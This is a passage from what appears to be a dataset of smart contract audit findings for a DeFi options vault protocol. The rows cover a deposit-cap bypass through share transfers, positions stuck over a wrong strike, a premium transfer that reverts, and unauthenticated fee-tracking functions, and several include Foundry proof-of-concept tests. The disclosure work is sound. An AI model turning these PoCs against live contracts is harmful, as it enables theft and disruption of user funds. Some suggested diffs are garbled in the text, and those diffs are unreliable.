""@project/testnet/TestnetPriceOracle.sol"";\\nimport {DVPUtils} from ""./utils/DVPUtils.sol"";\\nimport {TokenUtils} from ""./utils/TokenUtils.sol"";\\nimport {Utils} from ""./utils/Utils.sol"";\\nimport {VaultUtils} from ""./utils/VaultUtils.sol"";\\nimport {MockedIG} from ""./mock/MockedIG.sol"";\\nimport {MockedRegistry} from ""./mock/MockedRegistry.sol"";\\nimport {MockedVault} from ""./mock/MockedVault.sol"";\\nimport {TestnetSwapAdapter} from ""@project/testnet/TestnetSwapAdapter.sol"";\\nimport {PositionManager} from ""@project/periphery/PositionManager.sol"";\\n\\n\\ncontract IGVaultTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.DAILY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n function testIncorrectDeltaHedge() public {\\n _strike = 1e18;\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipDay(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n testBuyOption(1.09e18, 0.5e18, 0);\\n testBuyOption(1.09e18, 0.5e18, 0);\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 1e18, 0);\\n vm.stopPrank();\\n\\n console.log(""premium"", premium);\\n VaultUtils.logState(vault);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(""payoff received"", charliePayoff);\\n }\\n\\n VaultUtils.logState(vault);\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*2, vm);\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n// rest of code\\n premium 0\\n baseToken balance 2090000000000000000\\n sideToken balance 0\\n// rest of code\\n premium 25585649987654406\\n baseToken balance 1570585649987654474\\n sideToken balance 499999999999999938\\n// rest of code\\n premium 25752512349788475\\n baseToken balance 2141338162337442881\\n sideToken balance 0\\n// rest of code\\n premium 0\\n baseToken balance 1051338162337442949\\n sideToken balance 999999999999999938\\n// rest of code\\n```\\n\\nNotice:\\nFirst trade (amount = 1 wei) settles delta-hedge at current price (1.09): sideToken = 0 because price is just above kB\\n2nd trade (buy ig bull amount = 0.5) causes delta-hedge of buying 0.5 side token\\n3rd trade (buy ig bull amount = 0.5) causes delta-hedge of selling 0.5 side token (instead of buying 0.5)\\nLast trade (amount = 1 wei) causes vault to buy 1 side token for correct delta-hedge (but at 0 fee to user).","```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n" +Position Manager providing the wrong strike when storing user's position data,medium,"When users mint position using `PositionManager`, users can provide strike that want to be used for the trade. However, if the provided strike data is not exactly the same with IG's current strike, the minted position's will be permanently stuck inside the PositionManager's contract.\\nWhen `mint` is called inside `PositionManager`, it will calculate the premium, transfer the required base token, and eventually call `dvp.mint`, providing the user's provided information.\\n```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n IDVP dvp = IDVP(params.dvpAddr);\\n\\n if (params.tokenId != 0) {\\n tokenId = params.tokenId;\\n ManagedPosition storage position = _positions[tokenId];\\n\\n if (ownerOf(tokenId) != msg.sender) {\\n revert NotOwner();\\n }\\n // Check token compatibility:\\n if (position.dvpAddr != params.dvpAddr || position.strike != params.strike) {\\n revert InvalidTokenID();\\n }\\n Epoch memory epoch = dvp.getEpoch();\\n if (position.expiry != epoch.current) {\\n revert PositionExpired();\\n }\\n }\\n if ((params.notionalUp > 0 && params.notionalDown > 0) && (params.notionalUp != params.notionalDown)) {\\n // If amount is a smile, it must be balanced:\\n revert AsymmetricAmount();\\n }\\n\\n uint256 obtainedPremium;\\n uint256 fee;\\n (obtainedPremium, fee) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n\\n // Transfer premium:\\n // NOTE: The PositionManager is just a middleman between the user and the DVP\\n IERC20 baseToken = IERC20(dvp.baseToken());\\n baseToken.safeTransferFrom(msg.sender, address(this), obtainedPremium);\\n\\n // Premium already include fee\\n baseToken.safeApprove(params.dvpAddr, obtainedPremium);\\n\\n==> premium = dvp.mint(\\n address(this),\\n params.strike,\\n params.notionalUp,\\n params.notionalDown,\\n params.expectedPremium,\\n params.maxSlippage,\\n params.nftAccessTokenId\\n );\\n\\n // // rest of code.\\n }\\n```\\n\\n```\\n /// @inheritdoc IDVP\\n function mint(\\n address recipient,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown,\\n uint256 expectedPremium,\\n uint256 maxSlippage,\\n uint256 nftAccessTokenId\\n ) external override returns (uint256 premium_) {\\n strike;\\n _checkNFTAccess(nftAccessTokenId, recipient, amountUp + amountDown);\\n Amount memory amount_ = Amount({up: amountUp, down: amountDown});\\n\\n==> premium_ = _mint(recipient, financeParameters.currentStrike, amount_, expectedPremium, maxSlippage);\\n }\\n```\\n\\n```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n // // rest of code\\n\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n }\\n\\n if (params.tokenId == 0) {\\n // Mint token:\\n tokenId = _nextId++;\\n _mint(params.recipient, tokenId);\\n\\n Epoch memory epoch = dvp.getEpoch();\\n\\n // Save position:\\n _positions[tokenId] = ManagedPosition({\\n dvpAddr: params.dvpAddr,\\n==> strike: params.strike,\\n expiry: epoch.current,\\n premium: premium,\\n leverage: (params.notionalUp + params.notionalDown) / premium,\\n notionalUp: params.notionalUp,\\n notionalDown: params.notionalDown,\\n cumulatedPayoff: 0\\n });\\n } else {\\n ManagedPosition storage position = _positions[tokenId];\\n // Increase position:\\n position.premium += premium;\\n position.notionalUp += params.notionalUp;\\n position.notionalDown += params.notionalDown;\\n /* NOTE:\\n When, within the same epoch, a user wants to buy, sell partially\\n and then buy again, the leverage computation can fail due to\\n decreased notional; in order to avoid this issue, we have to\\n also adjust (decrease) the premium in the burn flow.\\n */\\n position.leverage = (position.notionalUp + position.notionalDown) / position.premium;\\n }\\n\\n emit BuyDVP(tokenId, _positions[tokenId].expiry, params.notionalUp + params.notionalDown);\\n emit Buy(params.dvpAddr, _positions[tokenId].expiry, premium, params.recipient);\\n }\\n```\\n\\nPoC\\nAdd the following test to `PositionManagerTest` contract :\\n```\\n function testMintAndBurnFail() public {\\n (uint256 tokenId, ) = initAndMint();\\n bytes4 PositionNotFound = bytes4(keccak256(""PositionNotFound()""));\\n\\n vm.prank(alice);\\n vm.expectRevert(PositionNotFound);\\n pm.sell(\\n IPositionManager.SellParams({\\n tokenId: tokenId,\\n notionalUp: 10 ether,\\n notionalDown: 0,\\n expectedMarketValue: 0,\\n maxSlippage: 0.1e18\\n })\\n );\\n }\\n```\\n\\nModify `initAndMint` function to the following :\\n```\\n function initAndMint() private returns (uint256 tokenId, IG ig) {\\n vm.startPrank(admin);\\n ig = new IG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vault.setAllowedDVP(address(ig));\\n\\n MarketOracle mo = MarketOracle(ap.marketOracle());\\n\\n mo.setDelay(ig.baseToken(), ig.sideToken(), ig.getEpoch().frequency, 0, true);\\n\\n Utils.skipDay(true, vm);\\n ig.rollEpoch();\\n vm.stopPrank();\\n\\n uint256 strike = ig.currentStrike();\\n\\n (uint256 expectedMarketValue, ) = ig.premium(0, 10 ether, 0);\\n TokenUtils.provideApprovedTokens(admin, baseToken, DEFAULT_SENDER, address(pm), expectedMarketValue, vm);\\n // NOTE: somehow, the sender is something else without this prank// rest of code\\n vm.prank(DEFAULT_SENDER);\\n (tokenId, ) = pm.mint(\\n IPositionManager.MintParams({\\n dvpAddr: address(ig),\\n notionalUp: 10 ether,\\n notionalDown: 0,\\n strike: strike + 1,\\n recipient: alice,\\n tokenId: 0,\\n expectedPremium: expectedMarketValue,\\n maxSlippage: 0.1e18,\\n nftAccessTokenId: 0\\n })\\n );\\n assertGe(1, tokenId);\\n assertGe(1, pm.totalSupply());\\n }\\n```\\n\\nRun the test :\\n```\\nforge test --match-contract PositionManagerTest --match-test testMintAndBurnFail -vvv\\n```\\n","When storing user position data inside PositionManager, query IG's current price and use it instead.\\n```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n // // rest of code\\n\\n if (params.tokenId == 0) {\\n // Mint token:\\n tokenId = _nextId// Add the line below\\n// Add the line below\\n;\\n _mint(params.recipient, tokenId);\\n\\n Epoch memory epoch = dvp.getEpoch();\\n// Add the line below\\n uint256 currentStrike = dvp.currentStrike();\\n\\n // Save position:\\n _positions[tokenId] = ManagedPosition({\\n dvpAddr: params.dvpAddr,\\n// Remove the line below\\n strike: params.strike,\\n// Add the line below\\n strike: currentStrike,\\n expiry: epoch.current,\\n premium: premium,\\n leverage: (params.notionalUp // Add the line below\\n params.notionalDown) / premium,\\n notionalUp: params.notionalUp,\\n notionalDown: params.notionalDown,\\n cumulatedPayoff: 0\\n });\\n } else {\\n ManagedPosition storage position = _positions[tokenId];\\n // Increase position:\\n position.premium // Add the line below\\n= premium;\\n position.notionalUp // Add the line below\\n= params.notionalUp;\\n position.notionalDown // Add the line below\\n= params.notionalDown;\\n /* NOTE:\\n When, within the same epoch, a user wants to buy, sell partially\\n and then buy again, the leverage computation can fail due to\\n decreased notional; in order to avoid this issue, we have to\\n also adjust (decrease) the premium in the burn flow.\\n */\\n position.leverage = (position.notionalUp // Add the line below\\n position.notionalDown) / position.premium;\\n }\\n\\n emit BuyDVP(tokenId, _positions[tokenId].expiry, params.notionalUp // Add the line below\\n params.notionalDown);\\n emit Buy(params.dvpAddr, _positions[tokenId].expiry, premium, params.recipient);\\n }\\n```\\n","If the provided strike data does not match IG's current strike price, the user's minted position using `PositionManager` will be stuck and cannot be burned. This happens because when burn is called and `position.strike` is provided, it will revert as it cannot find the corresponding positions inside IG contract.\\nThis issue directly risking user's funds, consider a scenario where users mint a position near the end of the rolling epoch, providing the old epoch's current price. However, when the user's transaction is executed, the epoch is rolled and new epoch's current price is used, causing the mentioned issue to occur, and users' positions and funds will be stuck.","```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n IDVP dvp = IDVP(params.dvpAddr);\\n\\n if (params.tokenId != 0) {\\n tokenId = params.tokenId;\\n ManagedPosition storage position = _positions[tokenId];\\n\\n if (ownerOf(tokenId) != msg.sender) {\\n revert NotOwner();\\n }\\n // Check token compatibility:\\n if (position.dvpAddr != params.dvpAddr || position.strike != params.strike) {\\n revert InvalidTokenID();\\n }\\n Epoch memory epoch = dvp.getEpoch();\\n if (position.expiry != epoch.current) {\\n revert PositionExpired();\\n }\\n }\\n if ((params.notionalUp > 0 && params.notionalDown > 0) && (params.notionalUp != params.notionalDown)) {\\n // If amount is a smile, it must be balanced:\\n revert AsymmetricAmount();\\n }\\n\\n uint256 obtainedPremium;\\n uint256 fee;\\n (obtainedPremium, fee) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n\\n // Transfer premium:\\n // NOTE: The PositionManager is just a middleman between the user and the DVP\\n IERC20 baseToken = IERC20(dvp.baseToken());\\n baseToken.safeTransferFrom(msg.sender, address(this), obtainedPremium);\\n\\n // Premium already include fee\\n baseToken.safeApprove(params.dvpAddr, obtainedPremium);\\n\\n==> premium = dvp.mint(\\n address(this),\\n params.strike,\\n params.notionalUp,\\n params.notionalDown,\\n params.expectedPremium,\\n params.maxSlippage,\\n params.nftAccessTokenId\\n );\\n\\n // // rest of code.\\n }\\n```\\n" +"Whenever swapPrice > oraclePrice, minting via PositionManager will revert, due to not enough funds being obtained from user.",medium,"In `PositionManager::mint()`, `obtainedPremium` is calculated in a different way to the actual premium needed, and this will lead to a revert, denying service to users.\\nIn `PositionManager::mint()`, the PM gets `obtainedPremium` from DVP::premium():\\n```\\n(obtainedPremium, ) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n```\\n\\nThen the actual premium used when minting by the DVP is obtained via the following code:\\n\\nFrom the code above, we can see that the actual premium uses the greater of the two price options. However, `DVP::premium()` only uses the oracle price to determine the `obtainedPremium`.\\nThis leads to the opportunity for `premiumSwap > premiumOrac`, so in the PositionManager, `obtainedPremium` is less than the actual premium required to mint the position in the DVP contract.\\nThus, when the DVP contract tries to collect the premium from the PositionManager, it will revert due to insufficient balance in the PositionManager:\\n```\\nIERC20Metadata(baseToken).safeTransferFrom(msg.sender, vault, premium_ + vaultFee);\\n```\\n","When calculating `obtainedPremium`, consider also using the premium from `swapPrice` if it is greater than the premium calculated from `oraclePrice`.","Whenever `swapPrice > oraclePrice`, minting positions via the PositionManager will revert. This is a denial of service to users and this disruption of core protocol functionality can last extended periods of time.","```\\n(obtainedPremium, ) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n```\\n" +Transferring ERC20 Vault tokens to another address and then withdrawing from the vault breaks `totalDeposit` accounting which is tied to deposit addresses,medium,"Vault inherits from the ERC20, so it has transfer functions to transfer vault shares. However, `totalDeposit` accounting is tied to addresses of users who deposited with the assumption that the same user will withdraw those shares. This means that any vault tokens transfer and then withdrawal from either user breaks the accounting of `totalDeposit`, allowing to either bypass the vault's max deposit limitation, or limit the vault from new deposits, by making it revert for exceeding the vault deposit limit even if the amount deposited is very small.\\n`Vault` inherits from ERC20:\\n```\\ncontract Vault is IVault, ERC20, EpochControls, AccessControl, Pausable {\\n```\\n\\nwhich has public `transfer` and `transferFrom` functions to `transfer` tokens to the other users, which any user can call:\\n```\\n function transfer(address to, uint256 amount) public virtual override returns (bool) {\\n address owner = _msgSender();\\n _transfer(owner, to, amount);\\n return true;\\n }\\n```\\n\\nIn order to limit the deposits to vault limit, vault has `maxDeposit` parameter set by admin. It is used to limit the deposits above this amount, reverting deposit transactions if exceeded:\\n```\\n // Avoids underflows when the maxDeposit is setted below than the totalDeposit\\n if (_state.liquidity.totalDeposit > maxDeposit) {\\n revert ExceedsMaxDeposit();\\n }\\n\\n if (amount > maxDeposit - _state.liquidity.totalDeposit) {\\n revert ExceedsMaxDeposit();\\n }\\n```\\n\\nIn order to correctly calculate the current vault deposits (_state.liquidity.totalDeposit), the vault uses the following:\\nVault tracks cumulative deposit for each user (depositReceipt.cumulativeAmount)\\nWhen user deposits, cumulative deposit and vault's `totalDeposit` increase by the amount of asset deposited\\nWhen user initiates withdrawal, both user's cumulative amount and `totalDeposit` are reduced by the percentage of cumulative amount, which is equal to perecentage of shares being withdrawn vs all shares user has.\\nThis process is necessary, because the share price changes between deposit and withdrawal, so it tracks only actual deposits, not amounts earned or lost due to vault's profit and loss.\\nAs can easily be seen, this withdrawal process assumes that users can't transfer their vault shares, because otherwise the withdrawal from the user who never deposited but got shares will not reduce `totalDeposit`, and user who transferred the shares away and then withdraws all remaining shares will reduce `totalDeposit` by a large amount, while the amount withdrawn is actually much smaller.\\nHowever, since `Vault` is a normal `ERC20` token, users can freely transfer vault shares to each other, breaking this assumption. This leads to 2 scenarios:\\nIt's easily possible to bypass vault deposit cap: 1.1. Alice deposits up to max deposit cap (say, 1M USDC) 1.2. Alice transfers all shares except 1 wei to Bob 1.3. Alice withdraws 1 wei share. This reduces `totalDeposit` by full Alice deposited amount (1M USDC), but only 1 wei share is withdrawn, basically 0 assets withdrawn. 1.4. Alice deposits 1M USDC again (now the total deposited into the vault is 2M, already breaking the cap of 1M).\\nIt's easily possible to lock the vault from further deposits even though the vault might have small amount (or even 0) assets deposited. 2.1. Alice deposits up to max deposit cap (say, 1M USDC) 2.2. Alice transfers all shares except 1 wei to Bob 2.3. Bob withdraws all shares. Since Bob didn't deposit previously, this doesn't reduce `totalDeposit` at all, but withdraws all 1M USDC to Bob. At this point `totalDeposit` = 1M USDC, but vault has 0 assets in it and no further deposits are accepted due to `maxDeposit` limit.","Either disallow transferring of vault shares or track vault assets instead of deposits. Alternatively, re-design the withdrawal system (for example, throw out cumulative deposit calculation and simply calculate total assets and total shares and when withdrawing - reduce `totalDeposit` by the sharesWithdrawn / totalShares * totalDeposit)","Important security measure of vault max deposit limit can be bypassed, potentially losing funds for the users when the admin doesn't want to accept large amounts for various reasons (like testing something).\\nIt's possible to lock vault from deposits by inflating the `totalDeposit` without vault having actual assets, rendering the operations useless due to lack of liquidity and lack of ability to deposit. Even if `maxDeposit` is increased, `totalDeposit` can be inflated again, breaking protocol core functioning.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from ""forge-std/Test.sol"";\\nimport {console} from ""forge-std/console.sol"";\\nimport {UD60x18, ud, convert} from ""@prb/math/UD60x18.sol"";\\n\\nimport {IERC20} from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport {IPositionManager} from ""@project/interfaces/IPositionManager.sol"";\\nimport {Epoch} from ""@project/lib/EpochController.sol"";\\nimport {AmountsMath} from ""@project/lib/AmountsMath.sol"";\\nimport {EpochFrequency} from ""@project/lib/EpochFrequency.sol"";\\nimport {OptionStrategy} from ""@project/lib/OptionStrategy.sol"";\\nimport {AddressProvider} from ""@project/AddressProvider.sol"";\\nimport {MarketOracle} from ""@project/MarketOracle.sol"";\\nimport {FeeManager} from ""@project/FeeManager.sol"";\\nimport {Vault} from ""@project/Vault.sol"";\\nimport {TestnetToken} from ""@project/testnet/TestnetToken.sol"";\\nimport {TestnetPriceOracle} from ""@project/testnet/TestnetPriceOracle.sol"";\\nimport {DVPUtils} from ""./utils/DVPUtils.sol"";\\nimport {TokenUtils} from ""./utils/TokenUtils.sol"";\\nimport {Utils} from ""./utils/Utils.sol"";\\nimport {VaultUtils} from ""./utils/VaultUtils.sol"";\\nimport {MockedIG} from ""./mock/MockedIG.sol"";\\nimport {MockedRegistry} from ""./mock/MockedRegistry.sol"";\\nimport {MockedVault} from ""./mock/MockedVault.sol"";\\nimport {TestnetSwapAdapter} from ""@project/testnet/TestnetSwapAdapter.sol"";\\nimport {PositionManager} from ""@project/periphery/PositionManager.sol"";\\n\\n\\ncontract IGVaultTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.DAILY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n function testVaultDepositLimitBypass() public {\\n _strike = 1e18;\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipDay(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n (,,,,uint totalDeposit,,,,) = vault.vaultState();\\n console.log(""total deposits"", totalDeposit);\\n\\n vm.startPrank(alice);\\n vault.redeem(1e18);\\n vault.transfer(address(charlie), 1e18-1);\\n vault.initiateWithdraw(1);\\n vm.stopPrank();\\n\\n VaultUtils.logState(vault);\\n (,,,,totalDeposit,,,,) = vault.vaultState();\\n console.log(""total deposits"", totalDeposit);\\n\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n current epoch 1698566400\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n pendingDeposits 0\\n pendingWithdrawals 0\\n pendingPayoffs 0\\n heldShares 0\\n newHeldShares 0\\n base token notional 1000000000000000000\\n side token notional 1000000000000000000\\n ----------------------------------------\\n total deposits 2000000000000000000\\n current epoch 1698566400\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n pendingDeposits 0\\n pendingWithdrawals 0\\n pendingPayoffs 0\\n heldShares 0\\n newHeldShares 1\\n base token notional 1000000000000000000\\n side token notional 1000000000000000000\\n ----------------------------------------\\n total deposits 1000000000000000000\\n```\\n\\nNotice:\\nDemonstrates vault deposit limit bypass\\nVault has total assets of 2, but the total deposits is 1, allowing further deposits.","```\\ncontract Vault is IVault, ERC20, EpochControls, AccessControl, Pausable {\\n```\\n" +PositionManager will revert when trying to return back to user excess of the premium transferred from the user when minting position,medium,"`PositionManager.mint` calculates preliminary premium to be paid for buying the option and transfers it from the user. The actual premium paid may differ, and if it's smaller, excess is returned back to user. However, it is returned using the safeTransferFrom:\\n```\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n }\\n```\\n\\nThe problem is that `PositionManager` doesn't approve itself to transfer baseToken to `msg.sender`, and USDC `transferFrom` implementation requires approval even if address is transferring from its own address. Thus the transfer will revert and user will be unable to open position.\\n```\\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\\n _transfer(sender, recipient, amount);\\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, ""ERC20: transfer amount exceeds allowance""));\\n return true;\\n }\\n```\\n\\n```\\n function transferFrom(\\n address from,\\n address to,\\n uint256 value\\n )\\n external\\n override\\n whenNotPaused\\n notBlacklisted(msg.sender)\\n notBlacklisted(from)\\n notBlacklisted(to)\\n returns (bool)\\n {\\n require(\\n value <= allowed[from][msg.sender],\\n ""ERC20: transfer amount exceeds allowance""\\n );\\n _transfer(from, to, value);\\n allowed[from][msg.sender] = allowed[from][msg.sender].sub(value);\\n return true;\\n }\\n```\\n\\n`PositionManager` doesn't approve itself to do transfers anywhere, so `baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);` will always revert, preventing the user from opening position via `PositionManager`, breaking important protocol function.",Consider using `safeTransfer` instead of `safeTransferFrom` when transferring token from self.,"User is unable to open positions via `PositionManager` in certain situations as all such transactions will revert, breaking important protocol functionality and potentially losing user funds / profit due to failure to open position.","```\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n }\\n```\\n" +"FeeManager `receiveFee` and `trackVaultFee` functions allow anyone to call it with user-provided dvp/vault address and add any arbitrary feeAmount to any address, breaking fees accounting and temporarily bricking DVP smart contract",medium,"`FeeManager` uses `trackVaultFee` function to account vault fees. The problem is that this function can be called by any smart contract implementing `vault()` function (there are no address or role authentication), thus malicious user can break all vault fees accounting by randomly inflating existing vault's fees, making it hard/impossible for admins to determine the real split of fees between vaults. Moreover, malicious user can provide such `feeAmount` to `trackVaultFee` function, which will increase any vault's fee to `uint256.max` value, meaning all following calls to `trackVaultFee` will revert due to fee addition overflow, temporarily bricking DVP smart contract, which calls `trackVaultFee` on all mints and burns, which will always revert until `FeeManager` smart contract is updated to a new address in `AddressProvider`.\\nSimilarly, `receiveFee` function is used to account fee amounts received by different addresses (dvp), which can later be withdrawn by admin via `withdrawFee` function. The problem is that any smart contract implementing `baseToken()` function can call it, thus any malicious user can break all accounting by adding arbitrary amounts to their addresses without actually paying anything. Once some addresses fees are inflated, it will be difficult for admins to track fee amounts which are real, and which are from fake dvps and fake tokens.\\n`FeeManager.trackVaultFee` function has no role/address check:\\n```\\n function trackVaultFee(address vault, uint256 feeAmount) external {\\n // Check sender:\\n IDVP dvp = IDVP(msg.sender);\\n if (vault != dvp.vault()) {\\n revert WrongVault();\\n }\\n\\n vaultFeeAmounts[vault] += feeAmount;\\n\\n emit TransferVaultFee(vault, feeAmount);\\n }\\n```\\n\\nAny smart contract implementing `vault()` function can call it. The vault address returned can be any address, thus user can inflate vault fees both for existing real vaults, and for any addresses user chooses. This totally breaks all vault fees accounting.\\n`FeeManager.receiveFee` function has no role/address check either:\\n```\\n function receiveFee(uint256 feeAmount) external {\\n _getBaseTokenInfo(msg.sender).safeTransferFrom(msg.sender, address(this), feeAmount);\\n senders[msg.sender] += feeAmount;\\n\\n emit ReceiveFee(msg.sender, feeAmount);\\n }\\n// rest of code\\n function _getBaseTokenInfo(address sender) internal view returns (IERC20Metadata token) {\\n token = IERC20Metadata(IVaultParams(sender).baseToken());\\n }\\n```\\n\\nAny smart contract crafted by malicious user can call it. It just has to return base token, which can also be token created by the user. After transfering this fake base token, the `receiveFee` function will increase user's fee balance as if it was real token transferred.",Consider adding a whitelist of addresses which can call these functions.,"Malicious users can break all fee and vault fee accounting by inflating existing vaults or user addresses fees earned without actually paying these fees, making it hard/impossible for admins to determine the actual fees earned from each vault or dvp. Moreover, malicious user can temporarily brick DVP smart contract by inflating vault's accounted fees to `uint256.max`, thus making all DVP mints and burns (which call trackVaultFee) revert.","```\\n function trackVaultFee(address vault, uint256 feeAmount) external {\\n // Check sender:\\n IDVP dvp = IDVP(msg.sender);\\n if (vault != dvp.vault()) {\\n revert 